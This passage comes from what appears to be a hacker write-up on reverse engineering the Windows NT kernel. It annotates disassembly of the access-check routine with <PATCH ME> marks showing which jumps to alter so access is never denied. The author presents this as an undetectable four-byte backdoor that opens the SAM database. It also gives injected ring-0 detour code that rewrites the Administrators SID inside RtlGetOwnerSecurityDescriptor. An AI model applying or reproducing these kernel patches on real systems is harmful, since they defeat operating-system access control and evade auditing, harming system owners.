801998D4		 and	 cx, 4			; 80 04 become 00 04
801998D8		 jz	 short loc_801998EA	; normally doesnt jump
801998DA		 mov	 esi, [eax+10h]		; SD[10h] is an offset
							; value to the DACL in
							; the SD
801998DD		 test	 esi, esi		; make sure it exists
801998DF		 jz	 short loc_801998EA
801998E1		 test	 dh, 80h
801998E4		 jz	 short loc_801998EC
801998E6		 add	 esi, eax		; FFWDS to first DACL
							; in SD ******
801998E8		 jmp	 short loc_801998EC     ; normally all good
							; here, go ahead and
							; jump
801998EA ;
801998EA loc_801998EA:				 ; CODE	XREF: sub_80199836+A2
801998EA					 ; sub_80199836+A9
801998EA		 xor	 esi, esi
801998EC loc_801998EC:				 ; CODE	XREF: sub_80199836+AE
801998EC					 ; sub_80199836+B2
801998EC		 cmp	 cx, 4		 ; jump lands here
801998F0		 jnz	 loc_80199BC6
801998F6		 test	 esi, esi
801998F8		 jz	 loc_80199BC6
801998FE		 test	 edi, 80000h	; we normally dont match this,
						; so go ahead and jump
80199904		 jz	 short loc_8019995E
*** removed source here ***
8019995E ;
8019995E loc_8019995E:				 ; CODE	XREF: sub_80199836+CE
8019995E					 ; sub_80199836+D4 ...
8019995E		 movzx	 eax, word ptr [esi+4]	; jump lands
80199962		 mov	 [ebp+var_10], eax	; offset 4 is number of
							; ACE's present in DACL
							; var_10 = # Ace's
80199965		 xor	 eax, eax
80199967		 cmp	 [ebp+var_10], eax
8019996A		 jnz	 short loc_801999B7	; normally jump
*** removed source here ***
801999A2 ;
*** removed source here ***
801999B7 ;
801999B7 loc_801999B7:				 ; CODE	XREF: sub_80199836+134
801999B7		 test	 byte ptr [ebp+arg_C+3], 2 ; looks like part of
							   ; the flags data,
							   ; we usually jump
801999BB		 jz	 loc_80199AD3
*** removed source here ***
80199AD3 ;
80199AD3 loc_80199AD3:				 ; CODE	XREF: sub_80199836+185
80199AD3		 mov	 [ebp+var_C], 0	 ; jump lands here
80199ADA		 add	 esi, 8
80199ADD		 cmp	 [ebp+var_10], 0 ; is number of ACE's zero?
80199AE1		 jz	 loc_80199B79	 ; normally not
80199AE7 loc_80199AE7:				 ; CODE	XREF: sub_80199836+33D
80199AE7		 test	 edi, edi	 ; the EDI register is very 
						 ; important we will continue 
						 ; to loop back to this point 
						 ; as we traverse each ACE
						 ; the EDI register is modified
						 ; with each ACE's access mask 
						 ; if a SID match occurs.  
						 ; Access is allowed only if 
						 ; EDI is completely blank
						 ; by the time we are done. :-)

80199AE9		 jz	 loc_80199B79		; jumps to exit routine
							; if EDI is blank

80199AEF		 test	 byte ptr [esi+1], 8	; checks for ACE value
							; 8, second byte..
							; i dont know what 
							; this is, but if it's
							; not 8, its not 
							; evaluated, not 
							; important
80199AF3		 jnz	 short loc_80199B64
80199AF5		 mov	 al, [esi]		; this is the ACE type,
							; which is 0, 1, or 4
80199AF7		 test	 al, al			; 0 is ALLOWED_TYPE and
							; 1 is DENIED_TYPE
80199AF9		 jnz	 short loc_80199B14	; jump to next block if
							; it's not type 0
80199AFB		 lea	 eax, [esi+8]		; offset 8 is the SID
80199AFE		 push	 eax			; pushes the ACE
80199AFF		 push	 [ebp+var_8]
80199B02		 call	 sub_801997C2		; checks to see if the
							; caller matches the 
							; SID return of 1 says
							; we matched, 0 means 
							; we did not
80199B07		 test	 al, al
80199B09		 jz	 short loc_80199B64	; a match here is good,
							; since its the ALLOWED
							; list
							; so a 2 byte patch can
							; NOP out this jump 
							; <PATCH ME>
80199B0B		 mov	 eax, [esi+4]
80199B0E		 not	 eax
80199B10		 and	 edi, eax		; whiddles off the part
							; of EDI that we 
							; matched ..
							; this chopping of 
							; flags can go on through
							; many loops
							; remember, we are only
							; good if ALL of EDI is
							; chopped away...
80199B12		 jmp	 short loc_80199B64
80199B14 ;
80199B14 loc_80199B14:				 ; CODE	XREF: sub_80199836+2C3
80199B14		 cmp	 al, 4			; check for ACE type 4
80199B16		 jnz	 short loc_80199B4B	; normally we aren't 
							; this type, so jump
*** removed source here ***
80199B4B ;
80199B4B loc_80199B4B:				 ; CODE	XREF: sub_80199836+2E0j
80199B4B		 cmp	 al, 1			; check for DENIED type
80199B4D		 jnz	 short loc_80199B64
80199B4F		 lea	 eax, [esi+8]		; offset 8 is the SID
80199B52		 push	 eax
80199B53		 push	 [ebp+var_8]
80199B56		 call	 sub_801997C2		; check the callers SID
80199B5B		 test	 al, al			; a match here is BAD, 
							; since we are being 
							; DENIED
80199B5D		 jz	 short loc_80199B64	; so make JZ a normal 
							; JMP <PATCH ME>

80199B5F		 test	 [esi+4], edi		; we avoid this flag 
							; check w/ the patch
80199B62		 jnz	 short loc_80199B79
80199B64 loc_80199B64:				 ; CODE	XREF: sub_80199836+2BD
80199B64					 ; sub_80199836+2D3
80199B64		 mov	 ecx, [ebp+var_10]	; our loop routine, 
							; called from above as
							; we loop around and 
							; around.
							; var_10 is the number
							; of ACE's
80199B67		 inc	 [ebp+var_C]		; var_C is the current 
							; ACE
80199B6A		 movzx	 eax, word ptr [esi+2]	; byte 3 is the offset
							; to the next ACE
80199B6E		 add	 esi, eax		; FFWD
80199B70		 cmp	 [ebp+var_C], ecx	; check to see if we 
							; are done
80199B73		 jb	 loc_80199AE7		; if not, go back up...
80199B79 loc_80199B79:				 ; CODE	XREF: sub_80199836+2AB
80199B79					 ; sub_80199836+2B3
80199B79		 xor	 eax, eax		; this is our general 
							; exit routine
80199B7B		 test	 edi, edi		; if EDI isnt empty, 
							; then a DENIED state 
							; was reached above
80199B7D		 jz	 short loc_80199B91	; so patch the JZ into
							; a JMP so we never 
							; return ACCESS_DENIED 
							; <PATCH ME>
80199B7F		 mov	 ecx, [ebp+arg_1C]
80199B82		 mov	 [ecx],	eax
80199B84		 mov	 eax, [ebp+arg_24]
80199B87		 mov	 dword ptr [eax], 0C0000022h	
80199B8D		 xor	 al, al
80199B8F		 jmp	 short loc_80199C0C
80199B91 ;
80199B91 loc_80199B91:				 ; CODE	XREF: sub_80199836+347
80199B91		 mov	 eax, [ebp+1Ch]
80199B94		 mov	 ecx, [ebp+arg_1C]	; result code into 
							; &arg_1C
80199B97		 or	 eax, [ebp+arg_C]	; checked passed in 
							; mask
80199B9A		 mov	 [ecx],	eax
80199B9C		 mov	 ecx, [ebp+arg_24]	; result code into 
							; &arg_24, should be 
							; zero
80199B9F		 jnz	 short loc_80199BAB	; if everything above 
							; went OK, we should
80199BA1		 xor	 al, al
80199BA3		 mov	 dword ptr [ecx], 0C0000022h
80199BA9		 jmp	 short loc_80199C0C
80199BAB ;
80199BAB loc_80199BAB:				 ; CODE	XREF: sub_80199836+369
80199BAB		 mov	 dword ptr [ecx], 0	; Good and Happy 
							; things, we passed!
80199BB1		 test	 ebx, ebx
80199BB3		 jz	 short loc_80199C0A
80199BB5		 push	 [ebp+arg_20]
80199BB8		 push	 dword ptr [ebp+var_2]
80199BBB		 push	 dword ptr [ebp-1]
80199BBE		 push	 ebx
80199BBF		 call	 sub_8019DC80
80199BC4		 jmp	 short loc_80199C0A
80199BC6 ;
	    removed code here
80199C0A loc_80199C0A:				 ; CODE	XREF: sub_80199836+123
80199C0A					 ; sub_80199836+152
80199C0A		 mov	 al, 1
80199C0C loc_80199C0C:				 ; CODE	XREF: sub_80199836+55
80199C0C					 ; sub_80199836+8F
80199C0C		 pop	 edi
80199C0D		 pop	 esi
80199C0E		 pop	 ebx
80199C0F		 mov	 esp, ebp
80199C11		 pop	 ebp
80199C12		 retn	 28h		 ; Outta Here!
80199C12 sub_80199836	 endp


Some STRUCTURE dumps along the way:

:d eax
0023:E1A1C174 01 00 04 80 DC 00 00 00-EC 00 00 00 00 00 00 00  ................
; this looks like a SD
0023:E1A1C184 14 00 00 00 02 00 C8 00-08 00 00 00 00 09 18 00  ................
0023:E1A1C194 00 00 00 10 01 01 00 00-00 00 00 03 00 00 00 00  ................
0023:E1A1C1A4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00  ................
0023:E1A1C1B4 00 00 00 03 00 00 00 00-00 00 00 00 00 09 18 00  ................
0023:E1A1C1C4 00 00 00 10 01 01 00 00-00 00 00 05 12 00 00 00  ................
0023:E1A1C1D4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00  ................
0023:E1A1C1E4 00 00 00 05 12 00 00 00-00 00 00 00 00 09 18 00  ................

:d esi
0023:E1A1C188 02 00 C8 00 08 00 00 00-00 09 18 00 00 00 00 10  ................
; OFFSET into the SD (DACL)
0023:E1A1C198 01 01 00 00 00 00 00 03-00 00 00 00 00 00 00 00  ................
0023:E1A1C1A8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 03  ................
0023:E1A1C1B8 00 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10  ................
0023:E1A1C1C8 01 01 00 00 00 00 00 05-12 00 00 00 00 00 00 00  ................
0023:E1A1C1D8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 05  ................
0023:E1A1C1E8 12 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10  ................
0023:E1A1C1F8 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00  ........ ... ...

The following formats appear to be the SD, DACL, and ACE:

-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
r |  |04|80|fo|  |  |  |fg|  |  |  |  |  |  |fd|  |  --==>
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
r: Revision, must be 1
fo: Offset to Owner SID
fg: Offset to Group SID
fd: Offset to DACL

-- -- -- -- -- -- -- -- -- --
r |  |  |  |na|  |  |  |sa|  |  --==>
-- -- -- -- -- -- -- -- -- --
r: Revision?
na: Number of ACE's
sa: Start of first ACE

-- -- -- -- -- -- -- -- -- --
t |i |oa|  |am|  |  |  |ss|  |  --==>
-- -- -- -- -- -- -- -- -- --
t: type, 0, 1, or 4
i: the ACE is ignored if this value isn't 8
oa: offset to next ACE
am: access mask associated with this SID
ss: start of the SID, normally at offset 8, but for ACE type 4, will be at
    offset 0Ch

So there you have it, a 4 byte patch.  Application of this patch will allow
almost anyone access to almost any object on your NT domain.  Also, it is
undetectable when auditing ACL's and the such.  The only indication something
is wrong is the fact your now opening the SAM database from a normal account 
w/o a hitch... I can kill any process without being denied access.. God knows 
what the NULL User session can get away with!.  I like that.  8-/.  Gee, it's 
almost USEFUL isn't it?

Reverse Engineering & Patch of the RTLGetOwnerSecurityDescriptor() function

As if the last patch wasn't good enough, this patch should illustrate how easy
it is add your own code to the Kernel.  Simply by patching a single jump, I 
was able to detour the execution path into a highwayman's patch, and return 
back to normal execution without a hitch.  This patch alters a SID in memory, 
violating the integrity of the security system.  With a little creative light,
this patch could be so much more.  There are hundreds of routines in the 
ntoskrnl.exe. You are executing your own code in ring-0, so anything is 
possible.  If for any other reason, this paper should open your mind to the 
possibilities.  Reversing the NT Kernel is nothing new, I am quite sure.  
I would bet that the NSA has the full source to the NT Kernel, and has written
some very elaborate patches.  In fact, they were probably on that for NT 3.5.

80184AAC ;
80184AAF		 align 4
80184AB0 ; Exported entry 719. RtlGetOwnerSecurityDescriptor
80184AB0 ;
80184AB0 ;		 S u b r o u t i n e
80184AB0 ; Attributes: bp-based	frame
80184AB0		 public	RtlGetOwnerSecurityDescriptor
80184AB0 RtlGetOwnerSecurityDescriptor proc near ; CODE	XREF: sub_8018F318+22
80184AB0 arg_0		 = dword ptr  8
80184AB0 arg_4		 = dword ptr  0Ch
80184AB0 arg_8		 = dword ptr  10h
80184AB0		 push	 ebp
80184AB1		 mov	 edx, [esp+arg_0]
80184AB5		 mov	 ebp, esp
80184AB7		 push	 esi

// MessageText:
//  Indicates a revision number encountered or specified is not one
//  known by the service.  It may be a more recent revision than the
//  service is aware of.
#define STATUS_UNKNOWN_REVISION          ((NTSTATUS)0xC0000058L)

On SD Revision:
The user mode function InitializeSecurityDescriptor() will set the revision
number for the SD. The InitializeSecurityDescriptor() function initializes a 
new security descriptor.

BOOL InitializeSecurityDescriptor(
PSECURITY_DESCRIPTOR pSecurityDescriptor,  // address of security descriptor
DWORD dwRevision  // revision level

pSecurityDescriptor: Points to a SECURITY_DESCRIPTOR structure that the
function initializes.

dwRevision: Specifies the revision level to assign to the security descriptor.

80184AB8		 cmp	 byte ptr [edx], 1	; Ptr to decimal 
							; value usually 01, 
							; (SD Revision)
80184ABB		 jz	 short loc_80184AC4
80184ABD		 mov	 eax, 0C0000058h	
80184AC2		 jmp	 short loc_80184AF3	; will exit

The next block here does some operations against the object stored *edx, which
is our first argument to this function.  I think this may be a SD.  There are
two different forms of an SD, absolute and relative.. here is the doc:

A security descriptor can be in absolute or self-relative form. In
self-relative form, all members of the structure are located contiguously 
in memory. In absolute form, the structure only contains pointers to the 

This [edx] object is passed in as absolute:

Argument 1 (a SECURITY_DESCRIPTOR structure):
:d edx
0023:E1F47488 01 00 04 80 5C 00 00 00-6C 00 00 00 00 00 00 00  ....\...l.......
; 01 Revision, Flags 04,
; Offset to Owner SID is 5C,
; Offset to Primary Group SID is 6C

0023:E1F47498 14 00 00 00 02 00 48 00-02 00 00 00 00 00 18 00  ......H.........
0023:E1F474A8 FF 00 0F 00 01 02 00 00-00 00 00 05 20 00 00 00  ............ ...
0023:E1F474B8 20 02 00 00 00 00 14 00-FF 00 0F 00 01 01 00 00   ...............
0023:E1F474C8 00 00 00 05 12 00 00 00-00 00 4E 00 C8 FD 14 00  ..........N.....
0023:E1F474D8 E8 00 14 00 41 00 64 00-6D 00 69 00 01 02 00 00  ....A.d.m.i.....
; SIDS start here, see below
0023:E1F474E8 00 00 00 05 20 00 00 00-20 02 00 00 01 05 00 00  .... ... .......
0023:E1F474F8 00 00 00 05 15 00 00 00-BA 5D FF 0C 5C 4F CF 51  .........]..\O.Q

80184AC4 ;
80184AC4 loc_80184AC4:			; CODE	XREF: 
					; RtlGetOwnerSecurityDescriptor+B
80184AC4		 mov	 eax, [edx+4]    ; we are here if the revision
						 ; is good
80184AC7		 xor	 ecx, ecx
80184AC9		 test	 eax, eax	 ; 01 00 04 80 >5C< which is 
						 ; [edx+4] must not be zero
						 ; if the value IS zero, this 
						 ; means the SD does NOT have a
						 ; owner, and it sets argument
						 ; 2 to NULL, then returns, 
						 ; ignoring argument 3 
						 ; altogether.
80184ACB		 jnz	 short loc_80184AD4
80184ACD		 mov	 esi, [ebp+arg_4]
80184AD0		 mov	 [esi],	ecx
80184AD2		 jmp	 short loc_80184AE1
80184AD4 ;
80184AD4 loc_80184AD4:			; CODE	XREF: 
					; RtlGetOwnerSecurityDescriptor+1B
80184AD4		 test	 byte ptr [edx+3], 80h   ; 01 00 04 >80< 5C 
							 ; which is [edx+3]
must be 80
80184AD8		 jz	 short loc_80184ADC
80184ADA		 add	 eax, edx		 ; adds edx to 5C, 
							 ; which must be an 
							 ; offset to the SID
							 ; within the SD

Note a couple of SIDS hanging around in this memory location.  The first one is
the Owner, the second one must be the Group.  The first SID, 1-5-20-220 is
BUILTIN\Administrators.  By changing the 220 to a 222, we can alter this to be
BUILTIN\Guests.  This will cause serious security problems.  That second SID
happens to be long nasty one.. that is your first indication that it's NOT a
built-in group.  In fact, in this case, the group is ANSUZ\None, a local group
on my NT Server (my server is obviously named ANSUZ.. ;)

:d eax
0023:E1A49F84 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00  ........ ... ...
; This is a SID in memory (1-5-20-220)
0023:E1A49F94 01 05 00 00 00 00 00 05-15 00 00 00 BA 5D FF 0C  .............]..
; another SID
0023:E1A49FA4 5C 4F CF 51 FD 28 9A 4E-01 02					
; (1-5-15-CFF5DBA-51CF4F5C-4E9A28FD-201)

Here we start working with arguments 1 & 2:
80184ADC loc_80184ADC:		 ; CODE	XREF: 
				 ; RtlGetOwnerSecurityDescriptor+28
80184ADC		 mov	 esi, [ebp+arg_4]
80184ADF		 mov	 [esi],	eax	 ; moving the address of the 
						 ; SID through the user
						 ; supplied ptr (PSID pOwner)
80184AE1 loc_80184AE1:		 ; CODE	XREF: 
				 ; RtlGetOwnerSecurityDescriptor+22
80184AE1		 mov	 ax, [edx+2]	 ; some sort of flags 
						 ; 01 00 >04< 80 5C
80184AE5		 mov	 edx, [ebp+arg_8]; argument 3, which is to be 
						 ; filled in with
flags data
80184AE8		 and	 al, 1
80184AEA		 cmp	 al, 1		 ; checking against a mask of 
						 ; 0x01
80184AEC		 setz	 cl		 ; set based on flags register
						 ; (if previous compare was
80184AEF		 xor	 eax, eax	 ; status is zero, all good ;)
80184AF1		 mov	 [edx],	cl	 ; the value is set for 
						 ; true/false
80184AF3 loc_80184AF3:		 ; CODE	XREF: 
				 ; RtlGetOwnerSecurityDescriptor+12
80184AF3		 pop	 esi
80184AF4		 pop	 ebp
80184AF5		 retn	 0Ch		 ; outta here, status in EAX
80184AF5 RtlGetOwnerSecurityDescriptor endp

This routine is called from the following stack(s):

Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor  (ET=31.98
:stack at 001B:00000000 (SS:EBP 0010:00000000)
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8E3FF04)
ntoskrnl!NtOpenProcessToken+025E at 0008:80198834 (SS:EBP 0010:F8E3FEEC)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8E3FE50)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8E3FD80)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8E3FD48)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8E3FD34)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP

Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor  (ET=3.62 milliseconds)
ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
ntoskrnl!PsCreateWin32Process+01E7 at 0008:80192B5D (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsCreateSystemThread+04CE at 0008:8019303E (SS:EBP 0010:F8CDFE6C)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDC8)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCF8)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCC0)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCAC)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP

ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsCreateSystemProcess+05FD at 0008:801938B1 (SS:EBP 0010:F8CDFE8C)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDEC)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFD1C)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCE4)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCD0)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP

ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04)
ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC)
ntoskrnl!PsRevertToSelf+0063 at 0008:8013577D (SS:EBP 0010:F8CDFE8C)
ntoskrnl!SeTokenImpersonationLevel+01A3 at 0008:8019F12F (SS:EBP 0010:F8CDFDE8)
ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFD9C)
ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCCC)
ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFC94)
ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFC80)
ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP
=> ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP

I began by trying to patch this call.  I decided to try and detect the Owner
SID of BUILTIN\Administrators (1-5-20-220) and change it to BUILTIN\Users
(1-5-20-221) on the fly.  The following code is what I patched in:

First, I located a region of memory where I could dump some extra code.  For
testing, I chose the region at 08:8000F2B0.  I found it to be initially all
zeroed out, so I figured it safe for a while. Next, I assembled some
instructions into this new area:

8000F2B0:	push ebx
		mov ebx, [eax + 08]
		cmp ebx, 20		  	; check the 20 in 1-5-20-XXX
		nop				; nop's are leftovers from 
						; debugging
		jnz 8000f2c2			; skip it if we aren't looking 
						; at a 20
		mov word ptr [eax+0c], 221	; write over old RID w/ new RID
						; of 221
8000f2c2:	pop ebx
		mov esi, [ebp + 0c]		; the two instructions
		mov [esi], eax			; that I nuked to make the 
						; initial jump
		jmp 80184ae1

Now, notice the last two instructions prior to the jump back to NT.  To make
this call, I had to install a JMP instruction into the NT subroutine itself.
Doing that nuked two actual instructions, as follows:

Original code:

80184ADC		 mov	 esi, [ebp+arg_4];<**===--- PATCHING A JUMP 
						 ;          HERE
80184ADF		 mov	 [esi],	eax
80184AE1		 mov	 ax, [edx+2]	 ; some sort of flags 
						 ; 01 00 >04< 80 5C
80184AE5		 mov	 edx, [ebp+arg_8]; argument 3, which is to be 
						 ; filled in with flags data

After patch:

80184ADC		 JMP 8000F2B0		 ; Note: this nuked two real 
						 ; instructions...

80184AE1		 mov	 ax, [edx+2]	 ; some sort of flags 
						 ; 01 00 >04< 80 5C

80184AE5		 mov	 edx, [ebp+arg_8]; argument 3, which is to be 
						 ; filled in with flags data

So, to correct this, the code that I am jumping to runs the two missing

		mov esi, [ebp + 0c]		; the two instructions
		mov [esi], eax			; that I nuked to make the 
						; initial jump

Alas, all is good.  I tested this patch for quite some time without a problem.
To verify that it was working, I checked the memory during the patch, and sure
enough, it was turning SID 1-5-20-220 into SID 1-5-20-221.  However, as with
all projects, I was not out of the water yet.  When getting the security 
properties for a file, the Owner still shows up as Administrators.  This patch
is clearly called during such a query, as I have set breakpoints.  However, 
the displayed OWNER is still administrators, even though I am patching the 
SID in memory. Further investigation has revealed that this routine isn't 
called to check access to a file object, but is called for opening process 
tokens, creating processes, and creating threads.  Perhaps someone could shed
some more light on this? Nonetheless, the methods used in this patch can be 
re-purposed for almost any Kernel routine, so I hope it has been a useful 

Appendix A: Exported functions for the SRM:


Here are the exported functions for the Object Manager:

Here are the exported functions for the IO Manager:

Here are the exported functions for the LSA:

The only imports are from the HAL DLL:

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